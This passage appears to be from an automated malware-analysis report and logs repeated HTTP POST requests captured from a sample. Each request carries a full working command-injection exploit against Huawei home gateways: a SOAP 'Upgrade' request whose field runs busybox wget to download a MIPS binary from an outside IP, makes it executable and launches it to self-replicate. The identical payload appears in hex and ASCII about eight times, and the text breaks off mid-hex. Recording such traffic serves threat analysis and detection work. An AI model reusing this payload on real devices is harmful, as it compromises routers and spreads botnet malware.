3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 